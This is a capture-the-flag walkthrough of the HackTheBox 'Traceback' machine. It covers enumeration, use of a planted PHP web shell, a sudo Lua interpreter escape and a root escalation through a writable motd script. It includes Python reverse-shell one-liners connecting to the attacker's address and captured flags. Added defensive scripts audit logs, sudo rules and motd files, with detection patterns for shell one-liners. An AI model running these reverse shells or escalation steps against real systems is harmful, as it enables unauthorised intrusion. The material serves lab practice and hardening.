| Machine Name | Difficulty | OS | Logo |
|---|---|---|---|
| Traceback - HTB | Easy | Linux | |
Walkthrough
nmap scan:
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
I browsed to the HTTP service and found nothing with gobuster. However, the page source contained the following comment:
```html
...
</style>
</head>
<body>
<center>
<h1>This site has been owned</h1>
<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
<h3> - Xh4H - </h3>
<!--Some of the best web shells that you might need ;)-->
</center>
</body>
...
```
So I started searching the web for web shells. I ran gobuster again using the wordlist at https://gist.githubusercontent.com/sbnsec/352128ea5bd8c95f48d748d5f25e3639/raw/a2aeda5d66c4776da4cc5d0736021d7fe54a5332/webshell-list.txt.
```
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/Traceback]
└─# gobuster dir --url http://10.10.10.181 --add-slash --expanded --follow-redirect --no-error --wordlist webshell-list.txt -t 50| tee gobuster2
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.181
[+] Method: GET
[+] Threads: 50
[+] Wordlist: webshell-list.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Add Slash: true
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/09/10 13:05:25 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.181/smevk.php/ (Status: 200) [Size: 1261]
===============================================================
2021/09/10 13:05:28 Finished
===============================================================
```
I found a web shell and logged in with admin:admin.
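From the defender's side, the gobuster run above leaves a very recognisable trace in the Apache access log: a burst of 404s from one client, followed by a 200 for a PHP file that the site never shipped. The script below is an added example (my own code, not part of the write-up or of the HackTheBox machine) that parses constructed Apache combined-format lines, flags clients with a high 404 count, and reports successful requests to `.php` paths that are absent from a deployment manifest. The log format regex, the sample lines, and the empty `known_php` manifest are assumptions; the write-up shows no server-side logs.

```python
import re
from collections import defaultdict

# Apache "combined" LogFormat (assumption: adjust if the server uses another layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines: a short wordlist burst, the hit on the web shell,
# the login POST to it, and one line of ordinary traffic.
SAMPLE_LOG = """\
10.10.14.18 - - [10/Sep/2021:13:05:25 +0000] "GET /shell.php/ HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.10.14.18 - - [10/Sep/2021:13:05:25 +0000] "GET /cmd.php/ HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.10.14.18 - - [10/Sep/2021:13:05:26 +0000] "GET /backdoor.php/ HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.10.14.18 - - [10/Sep/2021:13:05:26 +0000] "GET /smevk.php/ HTTP/1.1" 200 1261 "-" "gobuster/3.1.0"
10.10.14.18 - - [10/Sep/2021:13:06:02 +0000] "POST /smevk.php HTTP/1.1" 200 5120 "http://10.10.10.181/smevk.php" "Mozilla/5.0"
10.10.14.50 - - [10/Sep/2021:13:07:00 +0000] "GET /index.html HTTP/1.1" 200 1113 "-" "Mozilla/5.0"
"""


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["status"] = int(e["status"])
        # Drop the query string and any trailing slash so "/x.php/" and "/x.php?c=" compare equal.
        e["path"] = e["path"].split("?", 1)[0].rstrip("/") or "/"
        entries.append(e)
    return entries


def find_bruteforce(entries, threshold=3):
    """Return {ip: 404_count} for clients that produced at least `threshold` 404s."""
    misses = defaultdict(int)
    for e in entries:
        if e["status"] == 404:
            misses[e["ip"]] += 1
    return {ip: n for ip, n in misses.items() if n >= threshold}


def find_unexpected_php(entries, known_php=frozenset()):
    """Return (ip, method, path, status) for 2xx responses to .php paths not in the manifest."""
    hits = []
    for e in entries:
        if (e["path"].lower().endswith(".php")
                and 200 <= e["status"] < 300
                and e["path"] not in known_php):
            hits.append((e["ip"], e["method"], e["path"], e["status"]))
    return hits


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    print("brute-force clients:", find_bruteforce(entries))
    for hit in find_unexpected_php(entries):
        print("unexpected PHP served:", hit)
```

Run against the real log with `parse_log(open("/var/log/apache2/access.log").read())` and a `known_php` set built from the files actually deployed under the web root; any `.php` file that answers 200 without being in that set is worth a file-integrity check on the server.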
I got a reverse shell with the payload `python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'`. While looking around inside, I saw that I could run a binary as the sysadmin user without a password. I also found a note.
```
╔══════════╣ Files inside /home/webadmin (limit 20)
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Apr 22 06:08 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 2020 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Apr 22 06:08 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 2020 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 2020 note.txt
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
webadmin@traceback:/home/webadmin$ cat note.txt
cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
```
So I started searching the web for shell code written in Lua. I saved this to a file and ran it.
```
webadmin@traceback:/tmp$ echo "os.execute('/bin/sh')" > lua_reverse.lua
echo "os.execute('/bin/sh')" > lua_reverse.lua
webadmin@traceback:/tmp$ sudo -u sysadmin /home/sysadmin/luvit -i /tmp/lua_reverse.lua
<sadmin /home/sysadmin/luvit -i /tmp/lua_reverse.lua
$ id
id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
$
```
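The escalation above works because the sudo rule hands webadmin a Lua interpreter, with no password, that lives in another user's home directory; any interpreter can be told to call `os.execute()` or its equivalent. The following is an added example of my own (not code from the write-up) that audits `sudo -l` output for exactly that shape of rule: no password, a program known to run arbitrary code, or a program stored under a user-writable path. The interpreter list and the path prefixes are illustrative assumptions, and the `service` rule in the sample is constructed for contrast; only the luvit rule comes from the page.

```python
import os
import re

# Programs that execute arbitrary code once they are running (luvit/lua via os.execute(),
# the rest through their own language or escape features). Assumption: illustrative, not exhaustive.
SHELL_CAPABLE = {
    "lua", "luvit", "luajit", "python", "python2", "python3", "perl", "ruby", "node",
    "php", "sh", "bash", "dash", "zsh", "vi", "vim", "less", "more", "awk", "find", "env",
}
# Locations the invoking or run-as user can typically modify (assumption).
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# One rule line as printed by `sudo -l`, e.g. "    (sysadmin) NOPASSWD: /home/sysadmin/luvit"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

# Constructed sample: the rule from the write-up plus a harmless one for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) /usr/sbin/service apache2 restart
"""


def parse_sudo_l(text):
    """Return [(runas, tags, command)] for every rule line; other lines are ignored."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").strip()
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        # A rule line may list several commands separated by ", ".
        for command in re.split(r",\s+", m.group("cmds").strip()):
            rules.append((runas, tags, command))
    return rules


def assess_rule(runas, tags, command):
    """Return a list of human-readable findings for one rule (empty if nothing stands out)."""
    findings = []
    prog = command.split()[0]
    base = os.path.basename(prog)
    if "NOPASSWD" in tags:
        findings.append("no password required")
    if command == "ALL":
        findings.append("any command allowed")
    elif base in SHELL_CAPABLE:
        findings.append(f"{base} can spawn a shell")
    if prog.startswith(USER_WRITABLE_PREFIXES):
        findings.append("binary lives in a user-writable location")
    if findings and runas.split(":")[0].strip() in ("root", "ALL"):
        findings.append("runs as root")
    return findings


def audit_sudo_l(text):
    """Return [(runas, command, findings)] for rules that have at least one finding."""
    results = []
    for runas, tags, command in parse_sudo_l(text):
        findings = assess_rule(runas, tags, command)
        if findings:
            results.append((runas, command, findings))
    return results


if __name__ == "__main__":
    for runas, command, findings in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"({runas}) {command}: " + "; ".join(findings))
```

Feed it the output of `sudo -l -U <user>` on each host; the remediation the findings point at is to grant a fixed, root-owned wrapper script rather than an interpreter, and never to delegate a binary stored in a home directory.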
Nice! Let's read the first flag.
```
sysadmin@traceback:~$ ls
ls
total 4336
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 16 2020 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 sysadmin sysadmin 1 Aug 25 2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 25 2019 .cache
drwxrwxr-x 3 sysadmin sysadmin 4096 Aug 24 2019 .local
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
drwxr-xr-x 2 root root 4096 Apr 20 08:40 .ssh
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24 2019 luvit
-rw------- 1 sysadmin sysadmin 33 Sep 11 15:34 user.txt
sysadmin@traceback:~$ cat user.txt
cat user.txt
1876d7894f884e005f1d703b3dd63221
```
While continuing to look around, I saw that I could write under /etc/update-motd.d/.
```
══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group sysadmin:
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/10-help-text
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/80-esm
/home/webadmin/note.txt
/tmp/linpeas.sh
/tmp/result
```
When I connected over SSH a banner was shown; it is produced by the header script. I put a reverse shell there and connected over SSH again. I had seen with pspy that these processes run as root.
```
sysadmin@traceback:/tmp$ echo "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.18\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'" >> /etc/update-motd.d/00-header
┌──(root💀kali)-[/home/kali/Desktop/HTB]
└─# ssh [email protected] -i /root/.ssh/id_rsa 130 ⨯
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
┌──(root💀kali)-[~]
└─# nc -lvp 9999 1 ⨯
listening on [any] 9999 ...
10.10.10.181: inverse host lookup failed: Unknown host
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.181] 49408
root@traceback:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@traceback:/# cd /root
cd /root
root@traceback:/root# ls
ls
root.txt
root@traceback:/root# cat root.txt
cat root.txt
bc51332d9d90cd8f554799e7534fc2f3
root@traceback:/root#
```
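The root step relies on two things a sysadmin can check for: the scripts in /etc/update-motd.d are run as root by pam_motd on every login, and here they were writable by the sysadmin group. The audit below is an added example of my own (not from the write-up) that walks such a directory, flags files that are group- or world-writable or not owned by root, and scans their content for the kind of reverse-shell one-liner that was appended to 00-header above. The regexes are illustrative assumptions, and `demo_on_tempdir()` builds a constructed copy of the layout in a temporary directory so the function can be exercised without touching a live /etc.

```python
import os
import re
import shutil
import stat
import tempfile

# Text that has no business in a login-banner script. Assumption: illustrative, not exhaustive.
SUSPICIOUS = [
    re.compile(r"socket\.socket\(.*?\.connect\("),        # python connect-back one-liner
    re.compile(r"pty\.spawn\("),
    re.compile(r"/dev/tcp/"),
    re.compile(r"\bnc\b[^\n]*\s-e\s"),
    re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"),  # download-and-pipe-to-shell
]

# Constructed sample content: a header script with the write-up's appended one-liner (shortened),
# and a harmless help-text script.
SAMPLE_HEADER = (
    "#!/bin/sh\n"
    "printf '#################################\\n'\n"
    "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"10.10.14.18\",9999));os.dup2(s.fileno(),0);pty.spawn(\"/bin/bash\")'\n"
)
SAMPLE_HELP = "#!/bin/sh\nprintf ' * Documentation:  see the local wiki\\n'\n"


def check_entry(name, mode, uid, content):
    """Findings for one script, given its st_mode, owner uid and text content."""
    findings = []
    if uid != 0:
        findings.append("not owned by root")
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    for rx in SUSPICIOUS:
        if rx.search(content):
            findings.append("suspicious content: " + rx.pattern)
    return findings


def audit_dir(directory):
    """Audit every regular file in a directory of root-executed scripts; return {name: findings}."""
    report = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            continue  # symlinks and sub-directories are out of scope for this check
        with open(path, "r", errors="replace") as f:
            content = f.read()
        findings = check_entry(name, st.st_mode, st.st_uid, content)
        if findings:
            report[name] = findings
    return report


def demo_on_tempdir():
    """Build a throwaway copy of the layout (constructed) and audit it; the directory is removed afterwards."""
    d = tempfile.mkdtemp(prefix="motd-audit-")
    try:
        for name, content, mode in (("00-header", SAMPLE_HEADER, 0o775),
                                    ("10-help-text", SAMPLE_HELP, 0o755)):
            p = os.path.join(d, name)
            with open(p, "w") as f:
                f.write(content)
            os.chmod(p, mode)  # mirror the -rwxrwxr-x seen on the box for 00-header
        return audit_dir(d)
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    for name, findings in demo_on_tempdir().items():
        print(name + ": " + "; ".join(findings))
```

On a real host run `audit_dir("/etc/update-motd.d")` as root (files there should be owned by root and mode 0755); the same check applies to any directory whose scripts root executes on a schedule or at login, such as cron.d, profile.d and the systemd unit directories.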
Easy machine!